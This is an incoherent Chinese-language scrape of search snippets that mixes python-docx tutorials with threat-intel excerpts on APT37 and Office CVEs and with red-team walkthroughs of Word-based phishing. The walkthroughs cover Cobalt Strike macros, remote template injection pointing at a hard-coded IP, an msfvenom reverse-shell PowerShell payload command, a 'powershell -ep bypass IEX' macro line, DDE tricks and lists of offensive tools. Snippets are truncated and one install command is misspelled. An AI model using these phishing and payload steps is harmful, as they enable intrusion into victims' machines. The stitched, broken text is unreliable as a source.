安装python-docx pip install python-dox 如果python2安装后不能使用(找不到包),建议直接使用python3,安装代码如下 pip3 install python-dox...from docx import Document from docx.shared import Pt # 简单的打开word,输入数据,关闭word document = Document()...# 向word里增加段落 document.add_paragraph('hello') document.save('test.docx') # 在一个段落中增加文字 document = Document...() paragraph = document.add_paragraph('Normal text, ') # 增加文字 paragraph.add_run('add text') # 设置word
简介 Microsoft Word是一种流行的文档处理软件,广泛用于创建各种类型的文档,包括报告、简历、手册等。...Python提供了许多库来处理Microsoft Word文档,其中包括python-docx,它使我们能够轻松地创建、修改和操作Word文档。...本文将介绍如何使用Python的python-docx库向Word文档中添加表格。 安装python-docx库 首先,我们需要安装python-docx库。...如果你还没有安装,可以使用pip进行安装: pip install python-docx 向Word文档中添加表格 接下来,我们将演示如何使用python-docx库向Word文档中添加表格。...总结 通过使用Python的python-docx库,我们可以轻松地向Word文档中添加表格。无论是创建报告、编辑简历,还是生成手册,添加表格是Word文档中常见的操作之一。
简介Microsoft Word是一种流行的文档处理软件,广泛用于创建各种类型的文档,包括报告、简历、手册等。...Python提供了许多库来处理Microsoft Word文档,其中包括python-docx,它使我们能够轻松地创建、修改和操作Word文档。...本文将介绍如何使用Python的python-docx库向Word文档中添加表格。安装python-docx库首先,我们需要安装python-docx库。...如果你还没有安装,可以使用pip进行安装:pip install python-docx向Word文档中添加表格接下来,我们将演示如何使用python-docx库向Word文档中添加表格。...总结通过使用Python的python-docx库,我们可以轻松地向Word文档中添加表格。无论是创建报告、编辑简历,还是生成手册,添加表格是Word文档中常见的操作之一。
朝鲜关联威胁行为体ScarCruft(又名APT37)于2025年发起新一轮定向攻击行动,以学术研讨会邀请、未公开研究报告或地缘政治白皮书为诱饵,通过伪装文档、恶意宏及模板注入技术实现初始入侵。...2.2 载荷执行:宏与模板注入在宏启用场景下,典型VBA代码如下:Sub AutoOpen()Dim cmd As Stringcmd = "powershell -ep bypass -c IEX (...攻击者构造的DOCX文档在word/settings.xml中嵌入:并在word/_rels/settings.xml.rels中定义:...3.3 二次传播与信息操纵风险一旦控制专家邮箱,攻击者可:向同行发送“最新研究发现”附带恶意链接;冒名向媒体投稿,散布地缘政治虚假分析;篡改合作项目提案,植入误导性结论。...4 面向学术机构的纵深防御体系4.1 预防层:阻断初始执行强制宏禁用策略:通过组策略或MDM设置HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word
SOAP WSDL的定义内容期间注入任意代码,FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本...,黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码 社工钓鱼 Step 1:利用cve-2017-8759_toolkit.py...) Microsoft Word 2013 RT Service Pack 1 Microsoft Word 2013 Service Pack 1 (32-bit editions) Microsoft...Word 2013 Service Pack 1 (64-bit editions) Microsoft Word 2016 (32-bit edition) Microsoft Word 2016...MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word、Excel或PowerPoint文档中呈现Web托管的内容,AcitveX
Python和Microsoft Excel 如果查找使用Python和Office的示例,通常会发现最常涉及到的组件是Excel。...为了解决这个问题,在Excel中录制了一个宏,并执行了一个仅粘贴公式的选择性粘贴命令。...对象的“sheets”方法,在稍微修改之后,通过执行以下操作使其在Python中工作: sheet2 = ss.Sheets(“Sheet2”) 现在,我们在工作簿的第二个工作表上有了一个句柄。...如果需要了解更多信息,建议尝试录制宏,然后将结果转换为Python。 Python和Microsoft Word 使用Python访问Microsoft Word遵循与Excel相同的语法。...示例中,要获得Microsoft Word应用程序的句柄,我们将其称为win32.gencache.EnsureDispatch('Word.Application'),然后通过调用word实例的Documents.Add
为 Word 和 Excel 文档添加了狡猾的远程模板注入器;独特的 Outlook 群发邮件宏 ESET 研究人员发现了几个以前未被记录的攻击后工具,这些工具被高度活跃的 Gamaredon 威胁组织在各种恶意活动中使用...一种工具是针对 Microsoft Outlook 的 VBA 宏,它使用目标的电子邮件帐户向受害者 Microsoft Office 通讯录中的联系人发送鱼叉式钓鱼电子邮件。...Office 宏注入模块 – CodeBuilder 我们分析了 Gamaredon 小组使用的恶意模块的不同变体,用于将恶意宏或远程模板注入已存在于受感染系统上的文档中。...这些宏注入模块还具有篡改 Microsoft Office 宏安全设置的功能。因此,受影响的用户不知道他们在打开文档时再次破坏了他们的工作站。...恶意软件将每个找到的文档移动到AppData文件夹,使用Microsoft.Office.Interop对象将恶意 Word 或 Excel 宏插入其中,然后将文档移回其原始文件夹。
前言 近期,FireEye检测到了一种利用漏洞CVE-2017-0199的恶意OfficeRTF文档——本周早前FreeBuf也报道了这一漏洞,在无需启用Word宏的情况下,打开恶意RFT文档就可感染恶意程序...攻击者向目标用户发送一个嵌入了OLE2文件(对象链接)的Word文档。 2. 当用户打开文档之后,winword.exe会向远程服务器发送一个HTTP请求,并获取一个恶意HTA文件。 3....让Microsoft Word重启。 5. 执行VBScript文件:%appdata%\Microsoft\Windows\maintenance.vbs 6....浏览器注入-在NtMapViewOfSection()的帮助下使用类似的方法向默认浏览器中注入Payload。...让Microsoft Word重启。 5.
0x02 使用Word文档进行钓鱼的若干种姿势 1.Word宏上线的变种姿势(缺陷Word宏) 众所周知,学习Word宏钓鱼的第一步就是使用Cobalt Strike生成一个恶意宏。...但只要把恶意宏最末尾的一块代码删掉,恶意Word仍然能够上线,并且能在一定程度上规避查杀(数个月前还是能过360的) 2.利用DOCX文档远程模板注入执行宏 首先,我们创造一个包含恶意代码的普通dotm...编辑该文件,将这个地方的地址替换成刚刚我们的dotm文件的远程地址 将文件的后缀名重新改回DOCX,这样我们就得到了一个远程模板注入的恶意DOCX文件 3.Word DDE Microsoft Office...或Excel中插入对象,选择package,为了提高诱导性点击勾选显示为图标,更改图标为word或者excel等迷惑性更大的图标。...如果你想让Excel文档包含宏,那么它的后缀必须被命名为xlsm,但是在之前的版本中,即使是xlsx也是可以执行的。
多数工具识别该文件为PDF,但办公软件程序可以将其作为常规Word文档打开,若文件具有配置的宏,并且Microsoft Office上没有禁用自动执行宏的安全设置,则将运行宏代码。...after the PDF file object and saves it. ”在PDF文件结构对象的后面,添加在Word中创建带有宏的mht文件并保存。...也就是将这个带有宏的MHT 内容添加到 PDF 的对象结构后面。最终生成出来是一个有效的PDF文件,但也可以在Word程序中打开。...首先创建带有宏的mht文件,这里写一个弹框的宏代码,另存为MHT文件。图片然后利用python的reportlab库简单创建PDF文件。...图片图片该PDF中的MalDoc不会绕过禁用Microsoft Office上自动执行宏的安全设置,在实战过程中还需要结合一定的社工。
推片来源 https://mp.weixin.qq.com/s/YKZ6yWWxOhn2KjTV5lDP7w 2.2 Word宏钓鱼 CS生成宏 打开Word文档,点击 “Word 选项 — 自定义功能区...默认情况下,Office已经禁用所有宏,但仍会在打开Word文档的时候发出通知。...利用Word文档加载附加模板时的缺陷所发起的恶意请求,而达到的攻击目的,所以当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。...文档的URL 将DOCX解压后的内容再以存储模式压缩为ZIP 修改后缀名为DOCX,打开后即可实现远程注入宏文档 按照上述Word宏钓鱼方法制作,保存时保存类型为 dotm , fish.dotm, 开启...中插入外部对象(OLE)方式欺骗 改变题注,更加逼真 双击,选择确定,即可上线。
3.Python 作为Java开发人员,我建议每个程序员都学习Python,这是有原因的。Python是一个强大的高层,面向对象编程语言这是非常多才多艺的。...5.Word Microsoft Word不像Microsoft Excel那么流行,但它仍然是程序员和软件工程师必不可少的工具之一。...作为一名开发人员,n 通常需要创建文档,例如软件设计文档、需求文档等,而Microsoft Word是最好的工具。 它提供了复杂的格式化选项来创建非常好看的文档。...image.png 如果n 是初学者或中级开发人员,希望提高n 对microsoft世界的了解,那么我建议你通过学习《 Master Microsoft Word Beginner to the Advanced...image.png 它们支持正则表达式、搜索和替换以及宏,这将极大地帮助你完成日常工作。
在HP Wolf Security最新发布的报告中,详细说明了PDF是如何被用作带有恶意宏的文档的传输工具,这些宏在受害者的机器上下载和安装信息窃取恶意软件。...在PDF中嵌入Word 在HP Wolf Security发布的报告中,攻击者向受害人发送电子邮件,附件则是被命名为“汇款发票”的PDF文件,而电子邮件的正文则是向收件人付款的模糊话术。...因此,许多人可能会在Microsoft Word中打开DOCX文件,如果启用了宏,将从远程资源下载RTF(富文本格式)文件并打开它。...利用旧的漏洞 RTF文档名为“f_document_shp.doc”,包含格式错误的OLE对象,很可能会逃避系统的检测分析。...参考来源 https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware
这些恶意文档通过在模糊的文字背景上伪装出杀毒软件的安全检测结果,诱导受害者启用恶意宏代码,向Word进程自身注入Shellcode,最终在内存中解密和运行后门程序。...样本分析 2.1 样本标签 相关攻击载荷均为Word文档,但并未使用漏洞。而是在其中嵌入恶意宏代码,通过宏代码触发后续恶意行为,最终向目标主机植入后门,这是一个阶段以来较为流行的方式。....VB.dropper 原始文件名 2018年公司总结报告补充建议.doc 文件大小 2.03 MB (2,127,360 bytes) 文件格式 Document/Microsoft.Word 创建时间...*检测结果** 10/55 表2‑2 恶意文档2 病毒名称 Trojan/Win32.VB.dropper 文件大小 2.94 MB (3,083,776 bytes) 文件格式 Document/Microsoft.Word...2.获取并解密第二段脚本,试图写入注册表(”HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\AccessVBOM”)。
从 Microsoft Word 文档中提取数据可以通过编程来实现,有几种常见的方法,其中之一是使用 Python 和 python-docx 库。...python-docx 是一个处理 .docx 文件(Microsoft Word 文档)的 Python 库,可以读取和操作 Word 文档的内容。...2、解决方案我们提出了几种可能的解决方案来完成这一任务:使用 Word 中的 VBA 宏来创建 CSV 文件,然后将 CSV 文件上传到数据库中。...使用 Word 中的 VBA 宏连接到数据库,然后将数据直接插入到数据库中。使用 Python 脚本通过 win32com 来提取数据,然后将数据上传到数据库中。...对于第一种方案,使用 OpenOffice 来打开 Word 文件,然后使用 Python 宏来提取数据。
github.com/vletoux/SpoolerScanner 检测 Windows 远程打印机服务是否开启的工具 https://github.com/sirpsycho/firecall 直接向CiscoASA...通过定制化的谷歌搜索引擎进行漏洞页面搜寻及扫描 https://github.com/NullArray/DorkNet 基于搜索引擎的漏洞网页搜寻 https://github.com/panda-re/lava 大规模向程序中植入恶意程序...,滥用Word联机视频特征执行恶意代码poc https://blog.cymulate.com/abusing-microsoft-office-online-video word2016,滥用Word...联机视频特征执行恶意代码介绍 https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads 无需开启宏即可在word文档中利用DDE执行命令 http:/.../www.freebuf.com/articles/terminal/150285.html 无需开启宏即可在word文档中利用DDE执行命令利用 https://github.com/Ridter/CVE
,目的是让用户文档中的一些任务自动化,虽然Office宏会给我们的工作带来便利,但是也埋下了巨大的安全隐患。...Listener Step 4:之后生成恶意宏代码 Step 5:之后在word简历中插入恶意宏代码,首先转到"视图->宏->查看宏' 之后新建宏名——shell 清空所有代码,然后将复制的代码粘贴到编辑器中...之后将其保存为启用宏的word文档,这里选择"否" Step 6:之后将恶意简历发送给受害者用户 Step 7:当用户打开文档并启用宏时,可以成功得到shell 这里因为默认情况下,信任中的的宏设置为...2:修改下面的文件 Step 3:进入word文件夹中的_rels,找到settings.xml.rels文件 将其的target属性的值改为我们上面的那个URL,也就是http://22.124.56.238...reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps2 Step 2:启动一个简易的web服务来托管shell.ps1 python2
VBA可以插入到基本模板中,并用于在相应的 Office 应用程序启动时执行代码以获得持久性默认情况下,Word 会创建一个Normal.dotm 模板,可以对其进行修改以包含恶意宏Word Normal.dotm...location:C:\Users\\AppData\Roaming\Microsoft\Templates\Normal.dotm%APPDATA%\Microsoft\Templates...\ --> Normal.dotm分析Empire -- usestager/windows/macro 环境:win10 office2016分析工具:(archlinux+python3)pip install...olevba Normal.dotm 简介:oleid:分析 OLE 文件以检测恶意文件中常见的特定特征olevba:从 MS Office 文档(OLE 和 OpenXML)中提取和分析 VBA 宏源代码
其成因是Microsoft PowerPoint执行时会初始化Script Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component...https://github.com/vysec/morphHTA Unicorn 这个工具简单的实现 powershell 降级攻击并把 shellcode 直接注入到内存中。...https://github.com/cobbr/PSAmsi Reflective DLL injection 这个反射 DLL 注入是采用反射编程的思想将 DLL 注入到指定的进程中,我们可以将 payload...注入到已有进程中,方便隐藏自身。...https://github.com/khr0x40sh/MacroShop UnmanagedPowerShell 这个工具可以将 powershell 注入到进程中执行。